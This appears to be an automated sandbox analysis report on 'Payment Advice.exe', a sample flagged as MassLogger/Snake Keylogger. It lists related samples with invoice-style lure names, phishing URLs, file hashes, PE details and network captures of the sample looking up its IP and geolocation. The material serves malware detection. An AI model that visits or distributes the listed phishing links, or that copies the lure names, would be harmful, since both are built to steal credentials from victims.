 | SecuriteInfo.com.Win32.PWSX-gen.10368.23675.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | REQUEST FOR QUOTATION.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
 | BOOOKING -872872928229JK.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | SecuriteInfo.com.Win32.SuspectCrc.5906.14432.exe | malicious | Snake Keylogger | checkip.dyndns.org/
 | rt94UFPUzw1WEsSM.exe | malicious | MSIL Logger, MassLogger RAT | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | Payment details.exe | malicious | Snake Keylogger | 193.122.130.0
 | 20250301_173245__P20250301_173245__P.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | 193.122.6.168
 | MARCH SHIPMENT PLAN DOCS.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
 | DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | malicious | MSIL Logger, MassLogger RAT | 132.226.8.169
 | Purchase-New Order PO.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
 | SNKO05B250200012 SNKO05B250200023.exe | malicious | Snake Keylogger | 193.122.6.168
 | Payment Advice.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.6.168
 | rarrivalnotice.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
 | 50% deposit's payment advice.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
 | FACTURAS PENDIENTES.exe | malicious | Snake Keylogger | 158.101.44.242
reallyfreegeoip.org | Payment details.exe | malicious | Snake Keylogger | 104.21.64.1
 | 20250301_173245__P20250301_173245__P.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | 104.21.112.1
 | MARCH SHIPMENT PLAN DOCS.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.32.1
 | DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
 | Purchase-New Order PO.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
 | SNKO05B250200012 SNKO05B250200023.exe | malicious | Snake Keylogger | 104.21.112.1
 | Payment Advice.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.112.1
 | rarrivalnotice.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
 | 50% deposit's payment advice.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.96.1
 | FACTURAS PENDIENTES.exe | malicious | Snake Keylogger | 104.21.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | cbr.arm.elf | malicious | Mirai | 1.4.15.178
 | output.cmd | malicious | AgentTesla, Batch Injector, Discord Token Stealer | 172.67.74.152
 | https://docs.google.com/document/d/17J2L1eKLH0J5nHUzrjiF9IlkurD9afurJAGyfUFNVFI/edit?usp=sharing_eip&ts=67c8321f | malicious | HTMLPhisher, Invisible JS | 104.17.25.14
 | https://x3g.tcyoopxg.ru/eNDiSHVinaTEN/ | malicious | HTMLPhisher, Invisible JS | 104.16.2.189
 | https://stats.sender.net/link_click/eXzzr5-gpoZqzG-1uv25A/28201475b69bbc587107f3682383db16 | malicious | HTMLPhisher | 172.67.27.94
 | https://www.sendfilessecurely.com/getfile.aspx?id=pARB9my33Z7n44YKB9idRena3352du3vrZOK | malicious | Unknown | 104.21.92.56
 | https://activatemicrostfacctCGMcpsDaBY.mxylqif.ru/xZj1Kc/#aW5mb0B1cmxhdWItbHVuei5hdA== | malicious | HTMLPhisher, Invisible JS | 104.17.25.14
 | TagManager.exe | malicious | Unknown | 1.1.1.1
 | Message.eml | malicious | Unknown | 104.18.65.57
 | TagManager.exe | malicious | Unknown | 104.18.3.52
UTMEMUS | DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | malicious | MSIL Logger, MassLogger RAT | 132.226.8.169
 | rarrivalnotice.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.8.169
 | 50% deposit's payment advice.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73
 | zooHQzUhh0xIDWC.exe | malicious | MSIL Logger, MassLogger RAT | 132.226.8.169
 | rPurchaseOrder-25-1201.exe | malicious | Snake Keylogger | 132.226.247.73
 | Purchase Order # 8MJA15.exe | malicious | Snake Keylogger | 132.226.247.73
 | akXjj2a58b.vbs | malicious | GuLoader, Snake Keylogger | 132.226.247.73
 | r59e5aba5-e690-44bf-a397-997e3c24c602.exe | malicious | GuLoader, Snake Keylogger | 132.226.247.73
 | JUSTIFICANTE DE TRANSFERENCIA.exe | malicious | GuLoader, Snake Keylogger | 132.226.8.169
 | BUSDGH202412201.exe | malicious | MSIL Logger, MassLogger RAT | 132.226.8.169
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54328bd36c14bd82ddaa0c04b25ed9ad | Payment details.exe | malicious | Snake Keylogger | 104.21.80.1
 | 20250301_173245__P20250301_173245__P.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | 104.21.80.1
 | Irdff95nUE.exe | malicious | MoDiRAT | 104.21.80.1
 | Irdff95nUE.exe | malicious | MoDiRAT | 104.21.80.1
 | MARCH SHIPMENT PLAN DOCS.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
 | DHL Shipping Details Ref ID 446331798008765975594-pdf.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
 | Purchase-New Order PO.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
 | SNKO05B250200012 SNKO05B250200023.exe | malicious | Snake Keylogger | 104.21.80.1
 | Payment Advice.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
 | rarrivalnotice.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.80.1
                                                                      No context
                                                                      Process:C:\Users\user\Desktop\Payment Advice.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1216
                                                                      Entropy (8bit):5.34331486778365
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhg84qXKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3ogvitHo6hAHKzea
                                                                      MD5:E193AFF55D4BDD9951CB4287A7D79653
                                                                      SHA1:F94AD920B9E0EB43B5005D74552AB84EAA38E985
                                                                      SHA-256:08DD5825B4EDCC256AEB08525DCBCDA342252A9C9746BE23FBC70A801F5A596E
                                                                      SHA-512:86F6ECDB47C1A7FFA460F3BC6038ACAFC9D4DED4D1E8D1FB7B8FE9145D9D384AB4EE7A7C3BE959A25B265AFEDB8FD31BA10073EC116B65BFE3326EF2C53394E6
                                                                      Malicious:true
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1172
                                                                      Entropy (8bit):5.354777075714867
                                                                      Encrypted:false
                                                                      SSDEEP:24:3gWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:QWSU4xympjms4RIoU99tK8NDv
                                                                      MD5:F614CCA1D985910D63FFFF70966F53F5
                                                                      SHA1:A9BD00A65E13088BD96A2420E289487CD07D9D4C
                                                                      SHA-256:3714147C391F57DCDB11C8D0E7076367B3BD1D628A5FB73E2BEE67B99F034157
                                                                      SHA-512:AE362137DA68C2853EB39BC2EC5A6AD2361689225F28337F0738617D6DB986E4BCF985FE12E910405E621CE407B4E6AF3308ADDDE4F9D81E02F2ED8E27831CAE
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.595447541256849
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:Payment Advice.exe
                                                                      File size:594'432 bytes
                                                                      MD5:78ec5a1e11ee68c95a5e339fd492c90e
                                                                      SHA1:8423eca2ecf74c50f6f688d0555adf9b0a5ace2b
                                                                      SHA256:eb43ef748d41451eb6cbbf8ca967116280e754d24122b2961472f90c8c00aa9a
                                                                      SHA512:9b0fb8dc857f108d7a0c86d6b63bbf6ce99ee4cbde73bb0c31c6b0f1a09f970893f3daa841a26d491b55be300c62baa3232b5a5a5e3ae2c7935f815fea7bb769
                                                                      SSDEEP:12288:ejz9Mpm+gvyDcOE4R2629epTtir94JDGFlxPT:4z9LwoyKkpTc5MDGF
                                                                      TLSH:7BC4E0642269EB17D97A5BF80931E17453F92DED7811C21A8FEE6CEFB862F044D10263
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9.-...............0.............J'... ...@....@.. ....................................@................................
                                                                      Icon Hash:90cececece8e8eb0
                                                                      Entrypoint:0x49274a
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0xD22D0139 [Sat Sep 27 02:13:13 2081 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x926f8 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x94000 | 0x594 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x96000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x901ac | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x90750 | 0x90800 | 9af9b9438525b451e9bd0face3a4b7ef | False | 0.8557289413927336 | data | 7.6054071879897105 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x94000 | 0x594 | 0x600 | 5e8f4a7d671839c1200501dab763f371 | False | 0.4114583333333333 | data | 4.034211927375768 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x96000 | 0xc | 0x200 | 29246f52fc0c2a7a7ecad4dedeb2aed2 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x94090 | 0x304 | data | | | 0.42875647668393785
RT_MANIFEST | 0x943a4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
Comments |
CompanyName |
FileDescription | Project
FileVersion | 1.0.0.0
InternalName | iAbl.exe
LegalCopyright | Copyright 2023
LegalTrademarks |
OriginalFilename | iAbl.exe
ProductName | Project
ProductVersion | 1.0.0.0
Assembly Version | 1.0.0.0
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-03-05T13:08:21.158505+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49733 | 132.226.247.73 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 5, 2025 13:08:20.185101986 CET | 49733 | 80 | 192.168.2.4 | 132.226.247.73
Mar 5, 2025 13:08:20.190089941 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.4
Mar 5, 2025 13:08:20.190160990 CET | 49733 | 80 | 192.168.2.4 | 132.226.247.73
Mar 5, 2025 13:08:20.190440893 CET | 49733 | 80 | 192.168.2.4 | 132.226.247.73
Mar 5, 2025 13:08:20.195385933 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.4
Mar 5, 2025 13:08:20.889595032 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.4
Mar 5, 2025 13:08:20.892961979 CET | 49733 | 80 | 192.168.2.4 | 132.226.247.73
Mar 5, 2025 13:08:20.899674892 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.4
Mar 5, 2025 13:08:21.109308958 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.4
Mar 5, 2025 13:08:21.158504963 CET | 49733 | 80 | 192.168.2.4 | 132.226.247.73
Mar 5, 2025 13:08:21.931694031 CET | 49735 | 443 | 192.168.2.4 | 104.21.80.1
Mar 5, 2025 13:08:21.931736946 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.4
Mar 5, 2025 13:08:21.931801081 CET | 49735 | 443 | 192.168.2.4 | 104.21.80.1
Mar 5, 2025 13:08:21.939937115 CET | 49735 | 443 | 192.168.2.4 | 104.21.80.1
Mar 5, 2025 13:08:21.939970016 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.4
Mar 5, 2025 13:08:22.422580004 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.4
Mar 5, 2025 13:08:22.422652960 CET | 49735 | 443 | 192.168.2.4 | 104.21.80.1
Mar 5, 2025 13:08:22.427970886 CET | 49735 | 443 | 192.168.2.4 | 104.21.80.1
Mar 5, 2025 13:08:22.428006887 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.4
Mar 5, 2025 13:08:22.428672075 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.4
Mar 5, 2025 13:08:22.471060991 CET | 49735 | 443 | 192.168.2.4 | 104.21.80.1
Mar 5, 2025 13:08:22.473603964 CET | 49735 | 443 | 192.168.2.4 | 104.21.80.1
Mar 5, 2025 13:08:22.516323090 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.4
Mar 5, 2025 13:08:22.606746912 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.4
Mar 5, 2025 13:08:22.606807947 CET | 443 | 49735 | 104.21.80.1 | 192.168.2.4
Mar 5, 2025 13:08:22.606889009 CET | 49735 | 443 | 192.168.2.4 | 104.21.80.1
Mar 5, 2025 13:08:22.612032890 CET | 49735 | 443 | 192.168.2.4 | 104.21.80.1
Mar 5, 2025 13:09:26.109618902 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.4
Mar 5, 2025 13:09:26.109908104 CET | 49733 | 80 | 192.168.2.4 | 132.226.247.73
Mar 5, 2025 13:10:01.112371922 CET | 49733 | 80 | 192.168.2.4 | 132.226.247.73
Mar 5, 2025 13:10:01.119728088 CET | 80 | 49733 | 132.226.247.73 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 5, 2025 13:08:20.168857098 CET | 51492 | 53 | 192.168.2.4 | 1.1.1.1
Mar 5, 2025 13:08:20.175993919 CET | 53 | 51492 | 1.1.1.1 | 192.168.2.4
Mar 5, 2025 13:08:21.110563993 CET | 57818 | 53 | 192.168.2.4 | 1.1.1.1
Mar 5, 2025 13:08:21.931046963 CET | 53 | 57818 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 5, 2025 13:08:20.168857098 CET | 192.168.2.4 | 1.1.1.1 | 0xc714 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Mar 5, 2025 13:08:21.110563993 CET | 192.168.2.4 | 1.1.1.1 | 0xb9ae | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 5, 2025 13:08:20.175993919 CET | 1.1.1.1 | 192.168.2.4 | 0xc714 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Mar 5, 2025 13:08:20.175993919 CET | 1.1.1.1 | 192.168.2.4 | 0xc714 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 13:08:20.175993919 CET | 1.1.1.1 | 192.168.2.4 | 0xc714 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 13:08:20.175993919 CET | 1.1.1.1 | 192.168.2.4 | 0xc714 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 13:08:20.175993919 CET | 1.1.1.1 | 192.168.2.4 | 0xc714 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 13:08:20.175993919 CET | 1.1.1.1 | 192.168.2.4 | 0xc714 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 13:08:21.931046963 CET | 1.1.1.1 | 192.168.2.4 | 0xb9ae | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 13:08:21.931046963 CET | 1.1.1.1 | 192.168.2.4 | 0xb9ae | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 13:08:21.931046963 CET | 1.1.1.1 | 192.168.2.4 | 0xb9ae | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 13:08:21.931046963 CET | 1.1.1.1 | 192.168.2.4 | 0xb9ae | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 13:08:21.931046963 CET | 1.1.1.1 | 192.168.2.4 | 0xb9ae | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 13:08:21.931046963 CET | 1.1.1.1 | 192.168.2.4 | 0xb9ae | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Mar 5, 2025 13:08:21.931046963 CET | 1.1.1.1 | 192.168.2.4 | 0xb9ae | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 132.226.247.73 | 80 | 5216 | C:\Users\user\Desktop\Payment Advice.exe
Timestamp | Bytes transferred | Direction | Data
Mar 5, 2025 13:08:20.190440893 CET | 151 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
  Connection: Keep-Alive
Mar 5, 2025 13:08:20.889595032 CET | 273 | IN | HTTP/1.1 200 OK
  Date: Wed, 05 Mar 2025 12:08:20 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Mar 5, 2025 13:08:20.892961979 CET | 127 | OUT | GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
  Host: checkip.dyndns.org
Mar 5, 2025 13:08:21.109308958 CET | 273 | IN | HTTP/1.1 200 OK
  Date: Wed, 05 Mar 2025 12:08:21 GMT
  Content-Type: text/html
  Content-Length: 104
  Connection: keep-alive
  Cache-Control: no-cache
  Pragma: no-cache
  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 104.21.80.1 | 443 | 5216 | C:\Users\user\Desktop\Payment Advice.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-05 12:08:22 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2025-03-05 12:08:22 UTC | 854 | IN | HTTP/1.1 200 OK
  Date: Wed, 05 Mar 2025 12:08:22 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Cf-Ray: 91b97f94c9cf42d2-EWR
  Server: cloudflare
  Age: 262245
  Cache-Control: max-age=31536000
  Cf-Cache-Status: HIT
  Last-Modified: Sun, 02 Mar 2025 11:17:37 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lD1DVdJpPxYKq6MDQyvyJjZH7LcYmvy4iOuqJlLHbYu9rr0%2F0wEmqO1SyVrQSY2i8n8LWpBdX%2FghvMcBRqWBJLW%2BhI8ZdOYPzBuC5kOCibbjsGmJuRD559ZBpeZUbBwQfoHzWYsC"}],"group":"cf-nel","max_age":604800}
  Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1535&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1815920&cwnd=168&unsent_bytes=0&cid=be32be1beeeffcaa&ts=201&x=0"
